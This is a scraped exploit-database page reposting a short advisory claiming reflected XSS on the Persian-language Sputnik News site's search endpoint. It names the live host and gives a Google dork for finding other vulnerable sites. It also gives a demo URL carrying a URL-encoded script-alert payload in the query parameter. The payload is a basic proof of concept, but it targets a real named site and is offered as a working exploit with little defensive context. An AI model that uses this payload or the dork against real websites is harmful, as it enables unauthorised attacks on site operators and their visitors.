Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.io


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070115

Below is a copy:

Sputnik News Russian government has XSS vulnerabilities
################################################## ################################################## #####################
# #
# Exploit Title : Sputnik News Russian government has XSS vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : sputniknews.com (https://ir.sputniknews.com) #
# #
# Tested ON : Persian language version Host #
# #
# Security Risk : ~[LOW]~ #
# #
# Description : Description: All websites with this version used can be targeted  #
# #
# DorK : "intext:"search/?query="" #
# #
# #
# #
################################################## ################################################## #####################




Details :




the vulnerable file is "search"




XSS Expl0iTs :


https://ir.sputniknews.com/search/?query=XSS Codes






Dem0 :

https://ir.sputniknews.com/search/?query=%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E


Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.